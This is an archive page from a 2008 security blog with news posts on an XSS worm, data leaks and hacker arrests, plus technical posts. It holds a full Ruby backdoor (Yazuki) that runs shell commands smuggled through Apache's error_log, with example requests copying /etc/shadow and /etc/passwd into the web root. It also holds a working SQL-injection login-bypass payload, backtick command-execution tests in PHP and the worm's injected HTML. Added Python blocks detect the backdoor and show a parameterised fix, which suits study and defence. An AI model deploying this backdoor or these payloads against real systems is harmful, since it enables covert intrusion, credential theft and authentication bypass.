root@server:~# dd if=/dev/hacking of=/dev/wired bs=1337k

08th - July - 2008 - 20:00 - #permalink

Justin.tv hit by XSS Worm

Another XSS Worm has come to life. This time the video and chat community [justin.tv] has been hit by an XSS Worm which, once again, was non-malicious and only a Proof-of-Concept. The worm was coded and released by the authors of the website [www.thedefaced.org]. The original news I read can be found on [xssed.com]. x2Fusion from TheDefaced has stated the following about the worm:

This actually is the very first XSS worm which we have unleashed,
and it was solely upon research reasons; non-malicious at all :)

We've contacted the JTV Programmers prior to the fixing of the XSS worm
and have sorted things out with them and made sure that they knew NO
information such as IP Address, Cookies, Sessions and further
information which poses private is not to be released. After that
I put myself forward and found another XSS in turn to prove that
I was dedicated to helping JTV out in any further possible
vulnerabilities.

The worm was made possible by bad (in fact, no) sanitization of the "Location" field in the user profile. It was possible to inject arbitrary HTML and script into it, and the authors used the following to inject the worm's code:

<iframe id='tframeid' width=0 height=0 frameborder=0></iframe>
<script src="justinworm.js" language="javascript"></script>"

The authors of xssed.com have made a graphic (PNG) showing the spread of the worm through the justin.tv network, look [here].

The worm's source code can be found at [worms.xssing.com/sources/justintv.txt]. It is open to everyone because the authors coded it for educational purposes only. Furthermore, the vulnerability has been fixed by now, to be precise on Sun, 29 Jun 2008 21:12:21 GMT.

What to say? Well, once again an XSS Worm has seen the light of day, compromising 2525 profiles in total, and again it was NOT malicious! XSS Worms are still very young on the web and there are about a dozen around, all publicly available to learn from, BUT, and this is the problem: I guess it won't take much longer until the first malicious people enter the game and use the knowledge the good guys also have to do "bad" stuff. The potential is immense. Just imagine a malicious XSS Worm that manipulates a user's profile and embeds a manipulated SWF file into it, which automatically tries to attack the user's browser in order to execute arbitrary commands on the victim's machine and install malware, for botnets, for spam, for whatever might be interesting. The time will come; if website administrators don't learn it NOW they will soon learn it the hard way. There is still time to learn it the soft way, with the help of people like x2Fusion, who do ethical hacking, but it won't stay like this forever!

08th - July - 2008 - 08:00 - #permalink

Wired-Security readers know first

Reading my emails this morning I also found one from a friend of mine (Marko Rogge), pointing me to a Heisec news entry. The entry can be found [here] and is titled "MSN-Phishing und Link-Spam greift um sich", which translates to something like "MSN-Phishing and Link-Spam is increasing". It was posted on the 7th of July, in other words: yesterday. Readers of Wired-Security have known about this problem for a month; check the archive for the [news].

Furthermore, the Heise entry is not very informative: it does not say a lot about the whole problem, nothing about the website, the hoster etc. And one specific point is missing: the problem is not only a problem of MSN, the phishers' website also includes a login field for ICQ. All of that is missing from the Heise entry.

What shall I say? I am quite angry about this news, because I informed Heise by email ONE MONTH ago and I can prove it. They totally ignored my email and NOW, after one month, they write about it as if THEY had found it out. This is not only unprofessional, it leaves users at risk, uninformed, for over 30 days!

To prove I am not lying, here is the source of the email I sent to them:

MIME-Version: 1.0
Date: Wed, 4 Jun 2008 22:31:25 +0200
From: <skyout@wired-security.net>
To: red@heisec.de
Subject: MSN/ICQ Phishing
Message-ID: <61a07e03c1e1286dd80dd97b20947d7e@s2.nexpaserver.de>
X-Sender: skyout@wired-security.net
User-Agent: RoundCube Webmail
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit

http://wired-security.net/archive/2008/june/index.php#04_2_062008

Please look closer at this and maybe blog about it. If you do so,
please be so fair to link back to my blog. Thanks. SkyOut.

Look at the date: 4th of JUNE! So instead of being fair, blogging about it and linking back to my blog, they ignored it and make their users believe they have found something new, one month after my readers knew about it... This is unprofessional and awkward!

Conclusion: next time I won't inform Heise anymore. Let them stay uninformed if they cannot even credit those who informed them.

06th - July - 2008 - 04:30 - #permalink

Apache error_log Backdoors (DE)

It's been quite a while since I posted my last Hakin9 article here, but now it is time for a new one. I planned to release it much earlier, so sorry for the delay. The article is called "Apache error_log Backdoors" and was published in Hakin9 2/2008 (March).

The idea of the article is the following: every time a client connects to an Apache web server and requests a file that is not there, a line about this access gets written to Apache's error_log file, which on the OpenBSD system used here is stored in /var/www/logs/error_log (the path differs between distributions). We use this behaviour to receive shell commands, which then get executed. I coded a Proof-of-Concept called Yazuki in Ruby that demonstrates a simple backdoor, look here:

#!/usr/bin/env ruby

# Name: Yazuki
# Author: SkyOut
# Date: October 2007
# Website: http://wired-security.net/

# Used Ruby Version: 1.8.4
# Tested on: OpenBSD 4.1

# This Proof-of-Concept code shows a simple backdoor
# concept, that does not need any open port to execute
# shell commands. Yazuki will search the error_log file
# of Apache every 5 seconds for a specified password and
# executes the given command, that can have up to five
# arguments (for more, edit the line that builds "command").

# Possible commands: (Make sure to always have five arguments
# or edit the line that builds "command")
# less /etc/passwd > /var/www/htdocs/pw.txt ;
# ls -a /home > /var/www/htdocs/home.txt

# Define the error_log file of Apache
error_log = "/var/www/logs/error_log"

# Loop forever, checking the log every 5 seconds
loop do
  if File.file?(error_log) && File.readable?(error_log)
    # Walk through Apache's error_log line by line
    # (File.foreach closes the file again when done)
    File.foreach(error_log) do |line|
      # Only lines containing the password are of interest
      if line =~ /password/
        # Split the error_log line into whitespace-separated fields
        array = line.split(" ")
        # Fields 13..17 are the five words after the requested file name
        command = array.fetch(13) + " " + array.fetch(14) + " " +
                  array.fetch(15) + " " + array.fetch(16) + " " +
                  array.fetch(17)
        # Execute the command
        IO.popen(command)

        # Truncate the error_log file again
        File.truncate(error_log, 0) if File.writable?(error_log)
      end
    end
  end

  # Wait 5 seconds
  sleep 5
end

How does this code work? Well, it is very simple. We define a password (for example "password", though you should choose something better of course) and then we connect to the server like this:

GET /password [our shell commands go here] HTTP/1.1
Host: www.example.com
[newline]
[newline]

So, let's say we have installed our backdoor as root, then we could for example send the following command to the webserver:

GET /password cat /etc/shadow > /var/www/htdocs/shadow ; HTTP/1.1
Host: www.example.com
[newline]
[newline]

Of course this file does not exist, so Apache writes an error to error_log. Our backdoor searches that file every 5 seconds, and if it finds a line containing our specified password it takes the five words after it, joins them together and hands them to the underlying shell. In the code these are the following lines:

if line =~ /password/

array = line.split(" ")

command = array.fetch(13) + " " + array.fetch(14) + " " +
          array.fetch(15) + " " + array.fetch(16) + " " +
          array.fetch(17)

IO.popen(command)

After that the file gets truncated again, and we can now read the shadow file by connecting to the web server as follows:

GET /shadow HTTP/1.1
Host: www.example.com
[newline]
[newline]

The whole article printed in Hakin9 can be found [here] (Texts -> Attack).

The Proof-of-Concept code can be found [here] (Releases -> Hacking/Cracking).
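From the defender's side, the technique above leaves a trace: a "File does not exist" entry whose requested path carries shell syntax. The following Python script is an added example (not part of the article or of Yazuki); it parses error_log lines in the Apache 1.3 format that the backdoor's field offsets assume and flags such entries. The log lines are constructed samples.

```python
import re

# Constructed sample of an Apache 1.3 style error_log, not from a real server.
# Lines 2 and 3 are what requests like those in the post would leave behind;
# line 5 is a harmless missing file whose name merely contains a space.
SAMPLE_ERROR_LOG = """\
[Sun Jun 29 21:10:03 2008] [error] [client 192.0.2.10] File does not exist: /var/www/htdocs/favicon.ico
[Sun Jun 29 21:12:21 2008] [error] [client 192.0.2.77] File does not exist: /var/www/htdocs/password cat /etc/shadow > /var/www/htdocs/shadow ;
[Sun Jun 29 21:12:40 2008] [error] [client 192.0.2.77] File does not exist: /var/www/htdocs/password ls -a /home > /var/www/htdocs/home.txt
[Sun Jun 29 21:15:00 2008] [notice] Apache/1.3.29 (Unix) configured -- resuming normal operations
[Sun Jun 29 21:16:11 2008] [error] [client 192.0.2.11] File does not exist: /var/www/htdocs/old page.html
"""

# [timestamp] [error] [client ip] File does not exist: <path>
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] "
    r"File does not exist: (?P<path>.*)$"
)

# Characters a requested file name has no use for but a shell does:
# command separators, pipes, redirections and substitution.
SHELL_META = re.compile(r"[;|&><`$]")


def parse_missing_file(line):
    """Return (timestamp, client_ip, path) for a 'File does not exist' line, else None."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    return m.group("ts"), m.group("ip"), m.group("path")


def is_suspicious(path):
    """A missing-file path carrying a shell metacharacter looks like a command
    smuggled through the log rather than a mistyped URL."""
    return bool(SHELL_META.search(path))


def find_log_smuggled_commands(log_text):
    """Scan error_log text and return one dict per suspicious entry."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_missing_file(line)
        if parsed is None:
            continue
        ts, ip, path = parsed
        if is_suspicious(path):
            # First token is the (non-existent) file the request started with;
            # the rest is what a log-reading backdoor would hand to the shell.
            first, _, rest = path.partition(" ")
            hits.append({"ts": ts, "ip": ip, "file": first, "payload": rest})
    return hits


if __name__ == "__main__":
    for h in find_log_smuggled_commands(SAMPLE_ERROR_LOG):
        print(f"{h['ts']} {h['ip']} {h['file']} -> {h['payload']!r}")
```

A sudden drop in the size of error_log between two checks is a second signal worth alerting on, since the backdoor truncates the file after every command.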

06th - July - 2008 - 03:30 - #permalink

HTTP GET Request in C (Win32)

I am currently developing a program that uses an HTTP GET request to fetch data from a website. The first basic steps are done, thanks to the help of WildCat. If you want to look at the first steps, here we go. The headers and globals:

/* winsock2.h must come before windows.h, otherwise windows.h pulls in
   the old winsock.h and the two headers clash */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

/* windows.h already defines MAX_PATH as 260; undefine it first so our
   own buffer size does not trigger a redefinition warning */
#undef MAX_PATH
#define MAX_PATH 512
#define PORT 80

SOCKET sock;
SOCKADDR_IN remote_addr;

Then we have a function to set the host (could also be used to get the IP out of a hostname, see the lines commented out):

//u_long getip(const char *host)
void sethost(const char *host)
{
    struct hostent *hp;
    u_long host_ip;

    memset(&remote_addr, 0, sizeof(SOCKADDR_IN));
    remote_addr.sin_family = AF_INET;
    remote_addr.sin_port = htons(PORT);

    /* first try to read host as a dotted IP address ... */
    host_ip = inet_addr(host);

    if (host_ip == INADDR_NONE)
    {
        /* ... otherwise resolve the host name via DNS */
        if ((hp = gethostbyname(host)) != NULL)
        {
            //host_ip = *(u_long *)hp->h_addr_list[0];
            memcpy(&remote_addr.sin_addr, hp->h_addr_list[0], hp->h_length);
        }
    }
    else
    {
        /* host was already an IP literal, use it directly */
        remote_addr.sin_addr.s_addr = host_ip;
    }

    //return host_ip;
}

And finally the main() function to send the GET Request:

int main(void)
{
    WSADATA wsaData;

    char buffer[MAX_PATH];
    char recvbuff[MAX_PATH];
    int res;

    if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0)
    {
        fprintf(stderr, "WSAStartup failed\n");
        return 1;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET)
    {
        fprintf(stderr, "socket() failed: %d\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }

    sethost("www.example.com");

    if (connect(sock, (SOCKADDR *)&remote_addr, sizeof(remote_addr)) == SOCKET_ERROR)
    {
        fprintf(stderr, "connect() failed: %d\n", WSAGetLastError());
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    /* HTTP/1.0 request; the empty line terminates the header block */
    sprintf(buffer, "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n");
    send(sock, buffer, (int)strlen(buffer), 0);

    /* leave one byte for the terminating NUL so recvbuff can be used as a C string */
    res = recv(sock, recvbuff, sizeof(recvbuff) - 1, 0);
    if (res > 0)
    {
        recvbuff[res] = '\0';
        // do stuff here ...
    }

    closesocket(sock);
    WSACleanup();
    return 0;
}

In the future I will blog a bit more about this as it progresses!

05th - July - 2008 - 00:30 - #permalink

Data of 41000 citizens in the net

The Chaos Computer Club published a news item about a big data problem on the website of the market research institute TNS Infratest/Emnid. It was possible to get information about 41000 (maybe more) citizens who had worked with the institute. The problem was as simple as it was shocking and stupid. The URL of the website looked like the following: www.report-global.com/mimitacon/[some stuff]/pages/business/masterdata.aspx?fromWhere=base&id=11XXXX. When you logged in with a working account you at first only saw the details of that specific account, but by just changing the "id" parameter it was possible to see the profile data of other citizens. With a simple Python script the CCC was able to get about 41000 data sets.

What is really shocking is how detailed those reports were. Your email address was in there, your date of birth, your phone number. Furthermore very sensitive data could be seen, like your income, your job, your health insurance, your bank details, the credit cards you used and much more...

How was the CCC able to get at this information, did they hack into it? No, not really... They got a mail with a valid account and looked closer at the website. That simple, that shocking.


The original article at [www.ccc.de].

04th - July - 2008 - 04:30 - #permalink

All your data are belong to us

Not being in the best mood anyway, I just came across a news item on the blog of wired.com which really shocked me: all YouTube logs have to be handed over to a company called Viacom. The logs have a size of 4 terabytes, including user names and IP addresses, all the videos they have watched and everything they did on the YouTube website. Viacom filed suit against Google in March 2007 for allowing users to upload copyright-protected material to YouTube and they speak of damages of 1 billion USD. Now Google is forced to hand over ALL their logs to Viacom, who want to prove with this that people are watching a lot of copyright-protected material, more than free material.

Viacom wanted even more: a copy of every video marked as private, and more. This has been denied, but nevertheless the story is quite shocking to me. What is this all going to become in the future? The whole concept of Web 2.0 seems at risk when companies can force websites to shut down if they feel that copyright laws are broken. This case is a perfect example, and it's even worse that Viacom now has the right to get the logs, decided by a court on Wednesday.

How is this all going to develop in the future? Will all those great projects be forced down by companies? That would be very bad, as it would turn the internet into something else than it is now.


Original post: [blog.wired.com].

03rd - July - 2008 - 00:30 - #permalink

CFP for 25c3 opened now

The Call For Participation/Papers for the annual congress of the Chaos Computer Club has opened. You can now hand in the ideas you would like to give a talk or a workshop about, or whatever else. The topics are as always: Hacking, Making, Science, Society, Culture and Community. From the page of the Chaos Computer Club:

Criteria by which we assess a lecture

* we consider the topic in general relevant for the participants
* we consider the topic currently relevant for the participants
* we consider the topic interesting, fun and worthy to be known more
  about
* the lecture is about something the speaker made himself
* we think the lecture might be fun
* the lecture is part of a workshop (has a second part which is a
  workshop)
* the lecture presents something new
* the more information provided about the lecture and the speaker
  the better

The following "Dates and Deadlines" have been set:

* October 5th, 2008 (Midnight UTC) Submission due
* November 7th, 2008 (Midnight UTC) Final notification of
  acceptance (or earlier)
* November 28th, 2008 (Midnight UTC) Final papers due
* December 27th - 30th, 2008 Chaos Communication Congress

To submit something go to [cccv.pentabarf.org/submission/25C3].

02nd - July - 2008 - 20:00 - #permalink

The "Jonny Hell" case

It's been quite a while since a top story about a hacker has found its way into the media, but now it has happened again. Talking to my father, he told me that he had read a story in the newspaper about a guy called Aleksandr Suvorov, better known on the internet as "Jonny Hell", who was caught at Frankfurt (Main) International Airport by US Secret Service agents and brought to prison. I also read it on the internet, coming across it on "Spiegel Online". The story is very interesting for several reasons.

First of all it has to be said that some newspapers talk of Aleksandr Suvorov as the world's most wanted hacker (which is typical for the media to make it more shocking *no comment*), and for sure he is a big fish that they got, no question. "Spiegel Online" talks of millions of stolen credit cards that caused damage to people and companies of more than 100 million USD. Some other newspapers talk of only a few million. All in all the story is not totally clear, the media hype is immense. For example the "hack" of a cafe in the state of New York gave the hackers access to 5000 credit card numbers. But look closer:

Jonny Hell's case isn't like every other one. Many things are unclear, and the way his seizure happened is against the law! That has to be stated. Secret Service agents have NO right to arrest a person on German ground and bring him to prison. Furthermore, the arrest warrant for installing a trojan (packet sniffer) on the restaurant's computer was issued on the 12th of March this year, one week AFTER the seizure. What is also interesting is HOW LONG it takes until such a story reaches the public newspapers. It takes months until people are informed about what happened.

Let me make a cut here in the story of "Jonny Hell" and turn things around. Is this really a rare case? Did this only happen to him, and because he is SO DANGEROUS? Or can this happen to every small fish out there, evil or not, guilty or not? The answer is simple: it can happen to everyone, and it did. If you are part of the German hacker community you should still know it, if not I will tell you. A person known under the handle Rembrandt was caught in a similar, but much rougher, way on the 22nd of March 2007 in a restaurant in Berlin by agents who did not even say who they were or what they wanted. They took him with them in a car and brought him to a place he did not know, with no chance to find out where he was. He had to sign a statement to be set free, and they told him that if he did not sign it they could keep him for days or longer. They wanted to scare him and make him admit that he had hacked into the network of the Deutsche Bank for more than half a year. Even until today there has been no official charge against him, but the consequences of your apartment being raided, of being kept in a prison without the right to call a lawyer, and more, are more damaging than a charge could be. Your chances of getting a well-paid job in the security industry are almost zero.

Think about it: do you still think democracy works? Do you think it is more than a word written on paper? If yes, why can it happen that people get caught by agents who have no right to, and won't face consequences for doing so? Why can it happen that people are forced to sign a statement without speaking to a lawyer, without knowing what's actually going on, without PROOF!? ... Take a moment, think about it.

02nd - July - 2008 - 02:00 - #permalink

Why ICQ sucks

I was at work today, chatting with some friends on ICQ. Around 18:00 I went home and wanted to log in to my account again, which resulted in an error message from Pidgin. My instant messenger could not log in to ICQ anymore, but instead gave me the message "Your version is not up-to-date to work with ICQ, go to http//pidgin.im/". I guess millions have seen this message, and the site was no longer reachable, effectively a DDoS, whatever. To make Pidgin work again you would have to change a value in the header file oscar.h from 0x010a to 0x010b and recompile the whole program. For Linux users this might work out, but for Windows it is really annoying. So, why does ICQ do this? Simple answer: they want to force people to upgrade to ICQ 6, their new and "cooler" version of the client. If you check the whole thing with Wireshark while connecting you will see something like this (tip: look for the *.exe, that is what they want you to download and install):

Frame 35 (669 bytes on wire, 669 bytes captured)
Ethernet II, Src: ZonetTec_e1:57:32 (00:50:22:e1:57:32), \
Dst: *:*:* (*:*:*:*:*:*)
Internet Protocol, Src: 64.12.161.153 (64.12.161.153), \
Dst: *.*.*.* (*.*.*.*)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
    Total Length: 655
    Identification: 0x8aa2 (35490)
    Flags: 0x04 (Don't Fragment)
    Fragment offset: 0
    Time to live: 105
    Protocol: TCP (0x06)
    Header checksum: 0xb325 [correct]
    Source: 64.12.161.153 (64.12.161.153)
    Destination: *.*.*.* (*.*.*.*)
Transmission Control Protocol, Src Port: aol (5190), \
Dst Port: 11234 (11234), Seq: 11, Ack: 102, Len: 615
    Source port: aol (5190)
    Destination port: 11234 (11234)
    Sequence number: 11    (relative sequence number)
    [Next sequence number: 626    (relative sequence number)]
    Acknowledgement number: 102    (relative ack number)
    Header length: 20 bytes
    Flags: 0x18 (PSH, ACK)
    Window size: 16384
    Checksum: 0x7577 [correct]
        [Good Checksum: True]
        [Bad Checksum: False]
    [SEQ/ACK analysis]
    [PDU Size: 615]
AOL Instant Messenger
    Command Start: 0x2a
    Channel ID: Close Connection (0x04)
    Sequence Number: 26668
    Data Field Length: 609
    TLV: Unknown
        Value ID: Unknown (0x008e)
        Length: 1
        Value
    TLV: Screen name
        Value ID: Screen name (0x0001)
        Length: 9
        Value: 410996901
    TLV: BOS server string
        Value ID: BOS server string (0x0005)
        Length: 17
        Value: 64.12.25.112:5190
    TLV: Authorization cookie
        Value ID: Authorization cookie (0x0006)
        Length: 256
        Value
    TLV: Error Code
        Value ID: Error Code (0x0008)
        Length: 2
        Value: 28
    TLV: Error URL
        Value ID: Error URL (0x0004)
        Length: 46
        Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
    TLV: Latest Beta Build
        Value ID: Latest Beta Build (0x0040)
        Length: 4
        Value: 11
    TLV: Latest Beta Name
        Value ID: Latest Beta Name (0x0043)
        Length: 9
        Value: 5.33.3000
    TLV: Latest Beta URL
        Value ID: Latest Beta URL (0x0041)
        Length: 46
        Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
    TLV: Latest Beta Info
        Value ID: Latest Beta Info (0x0042)
        Length: 52
        Value: http://download.icq.com/download/icq6/whats_new.html
    TLV: Latest Release Build
        Value ID: Latest Release Build (0x0044)
        Length: 4
        Value: 11
    TLV: Latest Release Name
        Value ID: Latest Release Name (0x0047)
        Length: 9
        Value: 5.33.3000
    TLV: Latest Release URL
        Value ID: Latest Release URL (0x0045)
        Length: 46
        Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
    TLV: Latest Release Info
        Value ID: Latest Release Info (0x0046)
        Length: 52
        Value: http://download.icq.com/download/icq6/whats_new.html
01st - July - 2008 - 15:30 - #permalink

Code Injection? (2)

Last month I wrote about a possible Code Injection in a PHP file, which turned out not to be one, as I found out with some help from another person. That person then suggested that a stacked query could work to inject SQL commands, but this did not work either, because mysql_query() does not allow stacked queries. You can find all about this in the [archive]. But why do I write about it again? Because there is a possible way to inject SQL commands and bypass the script! Let's look at it again. This is the script:

[...]
$anmeldename=$_POST['anmeldename'];
$passwort=$_POST['passwort'];
$sql="SELECT * FROM `member` WHERE `Anmeldename`='$anmeldename'";
$erg=mysql_query($sql);
$zeile = mysql_fetch_object($erg);
$spw=md5($passwort);
if($zeile->Passwort==$spw)
[...]

So how can we bypass this script? Let's assume that the table `member` has two columns: "Anmeldename" and "Passwort". So the table should look like this:

+-------------+----------------------------------+
| Anmeldename | Passwort                         |
+-------------+----------------------------------+
| admin       | unknown to us                    |
+-------------+----------------------------------+ 

The interesting things are the last two lines. The password gets hashed with MD5 and saved to $spw. Then the most interesting part comes in: the first row given back by mysql_fetch_object() is searched for the field "Passwort" and that value is compared to the MD5 hash of the POSTed password. Okay, enough talk, here is the injection:

Anmeldename: x' LIMIT 0 UNION ALL SELECT 'admin', '9990775155c3518a0d7917f7780b24aa

Passwort: ttt

What happens here? If the injection works, the query will finally look like this: "SELECT * FROM `member` WHERE `Anmeldename`='x' LIMIT 0 UNION ALL SELECT 'admin','9990775155c3518a0d7917f7780b24aa'". Which results in a table looking like this:

+-------------+----------------------------------+
| Anmeldename | Passwort                         |
+-------------+----------------------------------+
| admin       | 9990775155c3518a0d7917f7780b24aa |
+-------------+----------------------------------+ 

And now we give the password "ttt" to the script, which is "9990775155c3518a0d7917f7780b24aa" as an MD5 hash! So finally "if($zeile->Passwort==$spw)" becomes "if(9990775155c3518a0d7917f7780b24aa==9990775155c3518a0d7917f7780b24aa)" and that is TRUE, which results in? Guess? Yeap, you are logged in!

Thanks go to [WildCat], who has tested this for me and can say for sure, that it works under PHP 5 plus MySQL 5!
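To show the bypass described above against a working login, and what a parameterised query changes, here is an added Python example (not part of the original post or of the PHP script it discusses). It mirrors the script's logic on an in-memory SQLite table instead of MySQL; since SQLite rejects a LIMIT before UNION, the post's payload is used without its `LIMIT 0` part, which yields the same first row here because no user is named 'x'. The table contents and the admin password are constructed sample data.

```python
import hashlib
import hmac
import sqlite3

# MD5 of "ttt" (the post gives it as 9990775155c3518a0d7917f7780b24aa)
MD5_TTT = hashlib.md5(b"ttt").hexdigest()

# The post's payload is "x' LIMIT 0 UNION ALL SELECT 'admin', '<md5>".
# SQLite rejects a LIMIT before UNION, so this demo drops the LIMIT 0:
# no row matches 'x', so the UNION row is the first row returned either way.
PAYLOAD_NAME = "x' UNION ALL SELECT 'admin', '" + MD5_TTT


def make_db():
    """In-memory stand-in for the post's `member` table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (Anmeldename TEXT, Passwort TEXT)")
    # the real admin password is unknown to the attacker; any value will do here
    db.execute("INSERT INTO member VALUES (?, ?)",
               ("admin", hashlib.md5(b"real-admin-secret").hexdigest()))
    db.commit()
    return db


def login_vulnerable(db, anmeldename, passwort):
    """Mirror of the PHP script: the POSTed name is pasted into the SQL string
    and the first row's Passwort is compared with md5() of the POSTed password."""
    sql = "SELECT * FROM member WHERE Anmeldename='" + anmeldename + "'"
    zeile = db.execute(sql).fetchone()
    if zeile is None:
        return False
    spw = hashlib.md5(passwort.encode()).hexdigest()
    return zeile[1] == spw


def login_fixed(db, anmeldename, passwort):
    """Same check with a bound parameter: the name can no longer alter the
    statement, so the row is always the real one for that name (or none).
    MD5 is kept only to stay comparable to the script; use a real password
    hash (bcrypt, scrypt, argon2) in practice."""
    sql = "SELECT Anmeldename, Passwort FROM member WHERE Anmeldename = ?"
    zeile = db.execute(sql, (anmeldename,)).fetchone()
    if zeile is None:
        return False
    spw = hashlib.md5(passwort.encode()).hexdigest()
    # constant-time comparison so the check itself leaks nothing via timing
    return hmac.compare_digest(zeile[1], spw)


def demo():
    """Run both logins against the payload and against the real credentials."""
    db = make_db()
    return {
        "vulnerable_with_payload": login_vulnerable(db, PAYLOAD_NAME, "ttt"),
        "fixed_with_payload": login_fixed(db, PAYLOAD_NAME, "ttt"),
        "fixed_with_real_password": login_fixed(db, "admin", "real-admin-secret"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```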


UPDATE: Once again I have to update this news (seems like it never wants to end). Veda messaged me again and told me it will work as a Code Injection if you use backticks. As a proof-of-concept he opened the PHP interpreter on his local machine and did the following:

% php -a
php > print md5();

Warning: md5() expects at least 1 parameter, 0 given in php shell \
code on line 1
php > print md5(x);
9dd4e461268c8034f5c8564e155c67a6
php > print md5(`mkdir foo`);
[...]
% ls
foo

No comment from my side! I hope that's it! EOF!


UPDATE 2: So another update... I won't comment this anymore, look for yourself:

joern@heaven:~$ cat test.php 
<?

$string = "`touch skyout-win`";
echo md5(x)."\n";
echo md5('')."\n";
echo md5(`touch  skyout-fail`)."\n";;
echo md5($string)."\n";;

?>
joern@heaven:~$ php test.php
9dd4e461268c8034f5c8564e155c67a6
d41d8cd98f00b204e9800998ecf8427e
d41d8cd98f00b204e9800998ecf8427e
70f42a7d8d215d0c5f0078b58ca5730f
joern@heaven:~$ ls skyout*
skyout-fail
joern@heaven:~$